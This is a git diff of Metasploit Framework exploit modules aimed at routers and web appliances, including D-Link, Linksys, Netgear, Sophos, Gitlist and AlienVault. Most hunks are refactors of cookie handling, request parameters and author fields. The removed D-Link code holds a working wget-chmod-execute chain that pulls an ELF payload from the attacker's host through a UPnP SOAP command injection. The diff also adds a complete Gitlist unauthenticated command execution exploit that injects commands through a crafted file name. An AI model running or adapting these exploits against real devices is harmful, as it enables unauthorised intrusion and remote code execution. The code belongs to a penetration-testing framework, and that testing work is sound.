-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
-    end
-    print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
-    type = "delete"
-    res = request(cmd, type)
-    if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
-    end
-    return
-  end
-
-  def exploit_mips
-
-    downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
-
-    #thx to Juan for his awesome work on the mipsel elf support
-    @pl = generate_payload_exe
-    @elf_sent = false
-
-    #
-    # start our server
-    #
-    resource_uri = '/' + downfile
-
-    if (datastore['DOWNHOST'])
-      service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
-    else
-      # do not use SSL for this part
-      # XXX: See https://dev.metasploit.com/redmine/issues/8498
-      # It must be possible to do this without directly editing the
-      # datastore.
-      if datastore['SSL']
-        ssl_restore = true
-        datastore['SSL'] = false
-      end
-
-      #we use SRVHOST as download IP for the coming wget command.
-      #SRVHOST needs a real IP address of our download host
-      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
-        srv_host = Rex::Socket.source_address(rhost)
-      else
-        srv_host = datastore['SRVHOST']
-      end
-
-      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
-
-      print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
-      start_service({'Uri' => {
-        'Proc' => Proc.new { |cli, req|
-          on_request_uri(cli, req)
-        },
-        'Path' => resource_uri
-      }})
-
-      # Restore SSL preference
-      # XXX: See https://dev.metasploit.com/redmine/issues/8498
-      # It must be possible to do this without directly editing the
-      # datastore.
-      datastore['SSL'] = true if ssl_restore
-    end
-
-    #
-    # download payload
-    #
-    print_status("#{rhost}:#{rport} - Asking the D-Link device to take and execute #{service_url}")
-    #this filename is used to store the payload on the device
-    filename = rand_text_alpha_lower(8)
-
-    cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}; chmod 777 /tmp/#{filename}; /tmp/#{filename}"
-    type = "add"
-    res = request(cmd, type)
-    if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
-    end
-
-    # wait for payload download
-    if (datastore['DOWNHOST'])
-      print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the D-Link device to download the payload")
-      select(nil, nil, nil, datastore['HTTP_DELAY'])
-    else
-      wait_linux_payload
-    end
-
-    register_file_for_cleanup("/tmp/#{filename}")
-
-    type = "delete"
-    res = request(cmd, type)
-    if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
-    end
-  end
-
-  def request(cmd, type)
+  def execute_command(cmd, opts)
+    new_portmapping_descr = rand_text_alpha(8)
+    new_external_port = rand(32767) + 32768
+    new_internal_port = rand(32767) + 32768
 
     uri = '/soap.cgi'
 
+    soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
+
     data_cmd = "<?xml version=\"1.0\"?>"
     data_cmd << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
     data_cmd << "<SOAP-ENV:Body>"
-
-    if type == "add"
-      vprint_status("#{rhost}:#{rport} - adding portmapping")
-
-      soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
-
-      data_cmd << "<m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
-      data_cmd << "<NewPortMappingDescription>#{@new_portmapping_descr}</NewPortMappingDescription>"
-      data_cmd << "<NewLeaseDuration></NewLeaseDuration>"
-      data_cmd << "<NewInternalClient>`#{cmd}`</NewInternalClient>"
-      data_cmd << "<NewEnabled>1</NewEnabled>"
-      data_cmd << "<NewExternalPort>#{@new_external_port}</NewExternalPort>"
-      data_cmd << "<NewRemoteHost></NewRemoteHost>"
-      data_cmd << "<NewProtocol>TCP</NewProtocol>"
-      data_cmd << "<NewInternalPort>#{@new_internal_port}</NewInternalPort>"
-      data_cmd << "</m:AddPortMapping>"
-    else
-      #we should clean it up ... otherwise we are not able to exploit it multiple times
-      vprint_status("#{rhost}:#{rport} - deleting portmapping")
-      soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping"
-
-      data_cmd << "<m:DeletePortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
-      data_cmd << "<NewProtocol>TCP</NewProtocol><NewExternalPort>#{@new_external_port}</NewExternalPort><NewRemoteHost></NewRemoteHost>"
-      data_cmd << "</m:DeletePortMapping>"
-    end
-
+    data_cmd << "<m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
+    data_cmd << "<NewPortMappingDescription>#{new_portmapping_descr}</NewPortMappingDescription>"
+    data_cmd << "<NewLeaseDuration></NewLeaseDuration>"
+    data_cmd << "<NewInternalClient>`#{cmd}`</NewInternalClient>"
+    data_cmd << "<NewEnabled>1</NewEnabled>"
+    data_cmd << "<NewExternalPort>#{new_external_port}</NewExternalPort>"
+    data_cmd << "<NewRemoteHost></NewRemoteHost>"
+    data_cmd << "<NewProtocol>TCP</NewProtocol>"
+    data_cmd << "<NewInternalPort>#{new_internal_port}</NewInternalPort>"
+    data_cmd << "</m:AddPortMapping>"
     data_cmd << "</SOAP-ENV:Body>"
     data_cmd << "</SOAP-ENV:Envelope>"
 
@@ -232,36 +132,9 @@ class Metasploit3 < Msf::Exploit::Remote
           },
         'data' => data_cmd
       })
-    return res
+      return res
     rescue ::Rex::ConnectionError
-      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
-      return nil
-    end
-  end
-
-  # Handle incoming requests from the server
-  def on_request_uri(cli, request)
-    #print_status("on_request_uri called: #{request.inspect}")
-    if (not @pl)
-      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
-      return
-    end
-    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
-    @elf_sent = true
-    send_response(cli, @pl)
-  end
-
-  # wait for the data to be sent
-  def wait_linux_payload
-    print_status("#{rhost}:#{rport} - Waiting for the target to request the ELF payload...")
-
-    waited = 0
-    while (not @elf_sent)
-      select(nil, nil, nil, 1)
-      waited += 1
-      if (waited > datastore['HTTP_DELAY'])
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it can't connect back to us?")
-      end
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
     end
   end
 end
diff --git a/modules/exploits/linux/http/dlink_upnp_exec_noauth_telnetd.rb b/modules/exploits/linux/http/dlink_upnp_exec_noauth_telnetd.rb
index 0c5ba23950..51e104c6c2 100644
--- a/modules/exploits/linux/http/dlink_upnp_exec_noauth_telnetd.rb
+++ b/modules/exploits/linux/http/dlink_upnp_exec_noauth_telnetd.rb
@@ -4,12 +4,17 @@
 ##
 
 require 'msf/core'
+require 'msf/core/module/deprecated'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
+  include Msf::Module::Deprecated
+
+  DEPRECATION_DATE = Date.new(2014, 9, 11)
+  DEPRECATION_REPLACEMENT = 'exploits/linux/http/dlink_upnp_exec_noauth'
 
   def initialize(info = {})
     super(update_info(info,
@@ -22,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'      =>
         [
-          'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module
+          'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery and Metasploit module
           'juan vazquez' # minor help with msf module
         ],
       'License'     => MSF_LICENSE,
diff --git a/modules/exploits/linux/http/dolibarr_cmd_exec.rb b/modules/exploits/linux/http/dolibarr_cmd_exec.rb
index ad798e8969..d50b15a7da 100644
--- a/modules/exploits/linux/http/dolibarr_cmd_exec.rb
+++ b/modules/exploits/linux/http/dolibarr_cmd_exec.rb
@@ -78,10 +78,10 @@ class Metasploit3 < Msf::Exploit::Remote
       'uri'    => @uri.path
     })
 
-    return [nil, nil] if not (res and res.headers['Set-Cookie'])
+    return [nil, nil] if res.nil? || res.get_cookies.empty?
 
     # Get the session ID from the cookie
-    m = res.headers['Set-Cookie'].match(/(DOLSESSID_.+);/)
+    m = res.get_cookies.match(/(DOLSESSID_.+);/)
     id = (m.nil?) ? nil : m[1]
 
     # Get the token from the decompressed HTTP body response
diff --git a/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb b/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb
index bc02f5d255..184ea9c2e6 100644
--- a/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb
+++ b/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb
@@ -67,7 +67,7 @@ class Metasploit4 < Msf::Exploit::Remote
     if res.headers['Location'] =~ /users\/login$/
       fail_with(Failure::NoAccess, 'Authentication failed')
     else
-      session = $1 if res.headers['Set-Cookie'] =~ /_session_id=([0-9a-f]*)/
+      session = $1 if res.get_cookies =~ /_session_id=([0-9a-f]*)/
       fail_with(Failure::UnexpectedReply, 'Failed to retrieve the current session id') if session.nil?
     end
 
diff --git a/modules/exploits/linux/http/fritzbox_echo_exec.rb b/modules/exploits/linux/http/fritzbox_echo_exec.rb
index 6990a9491a..181674f7e9 100644
--- a/modules/exploits/linux/http/fritzbox_echo_exec.rb
+++ b/modules/exploits/linux/http/fritzbox_echo_exec.rb
@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStagerEcho
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -24,8 +24,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'Author'      =>
         [
           'Unknown', # Vulnerability discovery
-          'Fabian Braeunlein <fabian@breaking.systems>', # Metasploit PoC with wget method
-          'Michael Messner <devnull@s3cur1ty.de>' # Metasploit module
+          'Fabian Braeunlein <fabian[at]breaking.systems>', # Metasploit PoC with wget method
+          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
         ],
       'License'     => MSF_LICENSE,
       'References'  =>
@@ -59,8 +59,9 @@ class Metasploit3 < Msf::Exploit::Remote
             }
           ],
         ],
-      'DefaultTarget'  => 0
+      'DefaultTarget'    => 0
       ))
+      deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
   end
 
   def check
@@ -109,6 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("#{peer} - Exploiting...")
 
     execute_cmdstager(
+      :flavor  => :echo,
       :linemax => 92
     )
   end
diff --git a/modules/exploits/linux/http/gitlist_exec.rb b/modules/exploits/linux/http/gitlist_exec.rb
new file mode 100644
index 0000000000..d5f7280cba
--- /dev/null
+++ b/modules/exploits/linux/http/gitlist_exec.rb
@@ -0,0 +1,119 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Gitlist Unauthenticated Remote Command Execution',
+      'Description'    => %q{
+          This module exploits an unauthenticated remote command execution vulnerability
+        in version 0.4.0 of Gitlist. The problem exists in the handling of an specially
+        crafted file name when trying to blame it.
+      },
+      'License'        => MSF_LICENSE,
+      'Privileged'     => false,
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Author'         =>
+        [
+          'drone', #discovery/poc by @dronesec
+          'Brandon Perry <bperry.volatile[at]gmail.com>' #Metasploit module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2014-4511'],
+          ['EDB', '33929'],
+          ['URL', 'http://hatriot.github.io/blog/2014/06/29/gitlist-rce/']
+        ],
+      'Payload'        =>
+        {
+          'Space'       => 8192, # max length of GET request really
+          'BadChars'    => "&\x20",
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'generic telnet python perl bash gawk netcat netcat-e ruby php openssl',
+            }
+        },
+      'Targets'        =>
+        [
+          ['Gitlist 0.4.0', { }]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jun 30 2014'
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
+      ], self.class)
+  end
+
+  def check
+    repo = get_repo
+
+    if repo.nil?
+      return Exploit::CheckCode::Unknown
+    end
+
+    chk = Rex::Text.encode_base64(rand_text_alpha(rand(32)+5))
+
+    res = send_command(repo, "echo${IFS}" + chk + "|base64${IFS}--decode")
+
+    if res && res.body
+      if res.body.include?(Rex::Text.decode_base64(chk))
+        return Exploit::CheckCode::Vulnerable
+      elsif res.body.to_s =~ /sh.*not found/
+        return Exploit::CheckCode::Vulnerable
+      end
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    repo = get_repo
+    if repo.nil?
+      fail_with(Failure::Unknown, "#{peer} - Failed to retrieve the remote repository")
+    end
+    send_command(repo, payload.encoded)
+  end
+
+  def get_repo
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, "/")
+    })
+
+    unless res
+      return nil
+    end
+
+    first_repo = /href="\/gitlist\/(.*)\/"/.match(res.body)
+
+    unless first_repo && first_repo.length >= 2
+      return nil
+    end
+
+    repo_name = first_repo[1]
+
+    repo_name
+  end
+
+  def send_command(repo, cmd)
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, repo, 'blame', 'master', '""`' + cmd + '`')
+    }, 1)
+
+    res
+  end
+
+end
diff --git a/modules/exploits/linux/http/gpsd_format_string.rb b/modules/exploits/linux/http/gpsd_format_string.rb
index bc7621a5dc..76af2bc1f7 100644
--- a/modules/exploits/linux/http/gpsd_format_string.rb
+++ b/modules/exploits/linux/http/gpsd_format_string.rb
@@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
           This module exploits a format string vulnerability in the Berlios GPSD server.
         This vulnerability was discovered by Kevin Finisterre.
       },
-      'Author'         => [ 'Yann Senotier <yann.senotier [at] cyber-networks.fr>' ],
+      'Author'         => [ 'Yann Senotier <yann.senotier[at]cyber-networks.fr>' ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
diff --git a/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb b/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb
index 676e931b3d..cbc3fc3043 100644
--- a/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb
+++ b/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb
@@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
         'josso_password' => datastore['PASSWORD']
       }
     })
-    if res and res.headers['Set-Cookie'] =~ /JOSSO_SESSIONID_josso=([A-F0-9]+)/
+    if res and res.get_cookies =~ /JOSSO_SESSIONID_josso=([A-F0-9]+)/
       return $1
     else
       return nil
diff --git a/modules/exploits/linux/http/linksys_e1500_apply_exec.rb b/modules/exploits/linux/http/linksys_e1500_apply_exec.rb
index 6e5c006a98..b76d50f6ba 100644
--- a/modules/exploits/linux/http/linksys_e1500_apply_exec.rb
+++ b/modules/exploits/linux/http/linksys_e1500_apply_exec.rb
@@ -25,7 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'      =>
         [
-          'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module
+          'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery and Metasploit module
           'juan vazquez' # minor help with msf module
         ],
       'License'     => MSF_LICENSE,
diff --git a/modules/exploits/linux/http/linksys_themoon_exec.rb b/modules/exploits/linux/http/linksys_themoon_exec.rb
index 0e7f7bd091..3496f27bd0 100644
--- a/modules/exploits/linux/http/linksys_themoon_exec.rb
+++ b/modules/exploits/linux/http/linksys_themoon_exec.rb
@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStagerEcho
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote
           'Johannes Ullrich', #worm discovery
           'Rew', # original exploit
           'infodox', # another exploit
-          'Michael Messner <devnull@s3cur1ty.de>', # Metasploit module
+          'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
           'juan vazquez' # minor help with msf module
         ],
       'License'     => MSF_LICENSE,
@@ -62,8 +62,9 @@ class Metasploit3 < Msf::Exploit::Remote
             }
           ],
         ],
-      'DefaultTarget'  => 0
+      'DefaultTarget'   => 0
       ))
+      deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
   end
 
 
@@ -115,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     print_status("#{peer} - Exploiting...")
-    execute_cmdstager
+    execute_cmdstager({:flavor  => :echo})
   end
 
 end
diff --git a/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb b/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb
index 26d1c3c07b..08717e1d2b 100644
--- a/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb
+++ b/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb
@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStagerEcho
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
       OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),
       OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])
     ], self.class)
-
+    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
   end
 
   def check
@@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit
     test_login
 
-    execute_cmdstager
+    execute_cmdstager({:flavor => :echo})
   end
 
   # Sends an HTTP request with authorization header to the router
diff --git a/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb b/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb
index bb8c137b99..1117679e52 100644
--- a/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb
+++ b/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb
@@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'      =>
         [
-          'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module
+          'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery and Metasploit module
           'juan vazquez' # minor help with msf module
         ],
       'License'     => MSF_LICENSE,
diff --git a/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb b/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb
index 7e778969bc..fc247d0772 100644
--- a/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb
+++ b/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb
@@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'      =>
         [
-          'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module
+          'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery and Metasploit module
           'juan vazquez' # minor help with msf module
         ],
       'License'     => MSF_LICENSE,
diff --git a/modules/exploits/linux/http/mutiny_frontend_upload.rb b/modules/exploits/linux/http/mutiny_frontend_upload.rb
index 03d03adf5f..e0fa99ef5e 100644
--- a/modules/exploits/linux/http/mutiny_frontend_upload.rb
+++ b/modules/exploits/linux/http/mutiny_frontend_upload.rb
@@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
         'method' => 'GET'
       })
 
-    if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/
+    if res and res.code == 200 and res.get_cookies =~ /JSESSIONID=(.*);/
       first_session = $1
     end
 
@@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'cookie' => "JSESSIONID=#{first_session}"
     })
 
-    if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/
+    if res and res.code == 200 and res.get_cookies =~ /JSESSIONID=(.*);/
       @session = $1
       return true
     end
diff --git a/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb b/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb
index d89036bbc8..3f318a8e46 100644
--- a/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb
+++ b/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb
@@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'      =>
         [
-          'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module
+          'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery and Metasploit module
           'juan vazquez' # minor help with msf module
         ],
       'License'     => MSF_LICENSE,
diff --git a/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb b/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb
index 5a6242c404..0424acb20b 100644
--- a/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb
+++ b/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb
@@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'      =>
         [
-          'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module
+          'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery and Metasploit module
           'juan vazquez' # minor help with msf module
         ],
       'License'     => MSF_LICENSE,
diff --git a/modules/exploits/linux/http/openfiler_networkcard_exec.rb b/modules/exploits/linux/http/openfiler_networkcard_exec.rb
index b1542c492e..d979506f7a 100644
--- a/modules/exploits/linux/http/openfiler_networkcard_exec.rb
+++ b/modules/exploits/linux/http/openfiler_networkcard_exec.rb
@@ -103,8 +103,12 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)")
     begin
       res = send_request_cgi({
-        'uri'    => "/admin/system.html?step=2&device=lo#{cmd}",
-        'cookie' => "usercookie=#{user}; passcookie=#{pass};",
+        'uri'       => '/admin/system.html',
+        'cookie'    => "usercookie=#{user}; passcookie=#{pass};",
+        'vars_get'  => {
+          'step'    => '2',
+          'device'  => "lo#{cmd}"
+        }
       }, 25)
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
       fail_with(Failure::Unknown, 'Connection failed')
diff --git a/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb b/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb
index accf593b61..e7a568baf2 100644
--- a/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb
+++ b/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb
@@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
         'iptest' => "127.0.0.1" # In order to make things as fast as possible
       }
     })
-    if res and res.code == 200 and res.headers.include?('Set-Cookie') and res.headers['Set-Cookie'] =~ /SESSIONID/
+    if res and res.code == 200 and res.get_cookies.include?('SESSIONID')
       return res.get_cookies
     else
       return nil
diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb
index 9be98b2b95..0b76af186e 100644
--- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb
+++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb
@@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'      =>
         [
-          'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module
+          'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery and Metasploit module
           'juan vazquez' # minor help with msf module
         ],
       'License'     => MSF_LICENSE,
diff --git a/modules/exploits/linux/http/sophos_wpa_iface_exec.rb b/modules/exploits/linux/http/sophos_wpa_iface_exec.rb
index ffc6163100..badc596fef 100644
--- a/modules/exploits/linux/http/sophos_wpa_iface_exec.rb
+++ b/modules/exploits/linux/http/sophos_wpa_iface_exec.rb
@@ -25,7 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'         =>
         [
-          'Brandon Perry <bperry.volatile@gmail.com>' # discovery and Metasploit module
+          'Brandon Perry <bperry.volatile[at]gmail.com>' # discovery and Metasploit module
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
@@ -100,9 +100,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
       print_status("Authenticating as " + datastore['USERNAME'])
       login = send_request_cgi({
-        'uri' => normalize_uri(target_uri.path, '/index.php?c=login'),
+        'uri' => normalize_uri(target_uri.path, '/index.php'),
         'method' => 'POST',
-        'vars_post' => post
+        'vars_post' => post,
+        'vars_get' => {
+          'c' => 'login',
+        }
       })
 
       if !login or login.code != 200 or login.body !~ /#{datastore['USERNAME']}<\/a>/
@@ -134,9 +137,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
       print_status("Changing old password hash to notpassword")
       passchange = send_request_cgi({
-        'uri' => normalize_uri(target_uri.path, '/index.php?c=change_password'),
+        'uri' => normalize_uri(target_uri.path, '/index.php'),
         'method' => 'POST',
-        'vars_post' => post
+        'vars_post' => post,
+        'vars_get' => {
+          'c' => 'change_password'
+        }
       })
 
       if !passchange or passchange.code != 200
@@ -166,9 +172,12 @@ class Metasploit3 < Msf::Exploit::Remote
       }
 
       login = send_request_cgi({
-        'uri' => normalize_uri(target_uri.path, 'index.php?c=login'),
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
         'method' =>  'POST',
-        'vars_post' => post
+        'vars_post' => post,
+        'vars_get' => {
+            'c' => 'login',
+        }
       })
 
       if !login or login.code != 200 or login.body !~ /admin<\/a>/
@@ -192,9 +201,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
       print_status("Sending payload")
       send_request_cgi({
-        'uri' => normalize_uri(target_uri.path, 'index.php?c=netinterface'),
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
         'method' => 'POST',
         'vars_post' => post,
+        'vars_get' => {
+            'c' => 'netinterface',
+        }
       })
   end
 end
diff --git a/modules/exploits/linux/http/zen_load_balancer_exec.rb b/modules/exploits/linux/http/zen_load_balancer_exec.rb
index 96e02f8cbf..71901569d9 100644
--- a/modules/exploits/linux/http/zen_load_balancer_exec.rb
+++ b/modules/exploits/linux/http/zen_load_balancer_exec.rb
@@ -88,7 +88,6 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit
     user  = datastore['USERNAME']
     pass  = datastore['PASSWORD']
-    auth  = Rex::Text.encode_base64("#{user}:#{pass}")
     cmd   = Rex::Text.uri_encode(";#{payload.encoded}&")
     lines = rand(100) + 1
 
@@ -96,11 +95,14 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)")
     begin
       res = send_request_cgi({
-        'uri'     => "/index.cgi?nlines=#{lines}&action=See+logs&id=2-2&filelog=#{cmd}",
-        'headers' =>
-          {
-            'Authorization' => "Basic #{auth}"
-          }
+        'uri'           => '/index.cgi',
+        'authorization' => basic_auth(user, pass),
+        'vars_get'      => {
+          'nlines'  => lines,
+          'action'  => 'See logs',
+          'id'      => '2-2',
+          'filelog' => cmd
+        }
       }, 25)
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
       fail_with(Failure::Unreachable, 'Connection failed')
diff --git a/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb b/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb
new file mode 100644
index 0000000000..0ac3e19cd3
--- /dev/null
+++ b/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb
@@ -0,0 +1,140 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rexml/document'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include REXML
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'AlienVault OSSIM av-centerd Command Injection',
+      'Description'   => %q{
+        This module exploits a code execution flaw in AlienVault 4.6.1 and
+        prior.  The vulnerability exists in the av-centerd SOAP web service,
+        where the update_system_info_debian_package method uses perl backticks
+        in an insecure way, allowing command injection. This module has been
+        tested successfully on AlienVault 4.6.0.
+      },
+      'Author'        =>
+        [
+          'Unknown', # From HP ZDI team, Vulnerability discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'License'       => MSF_LICENSE,
+      'References'    =>
+        [
+          ['CVE', '2014-3804'],
+          ['BID', '67999'],
+          ['ZDI', '14-202'],
+          ['URL', 'http://forums.alienvault.com/discussion/2690']
+        ],
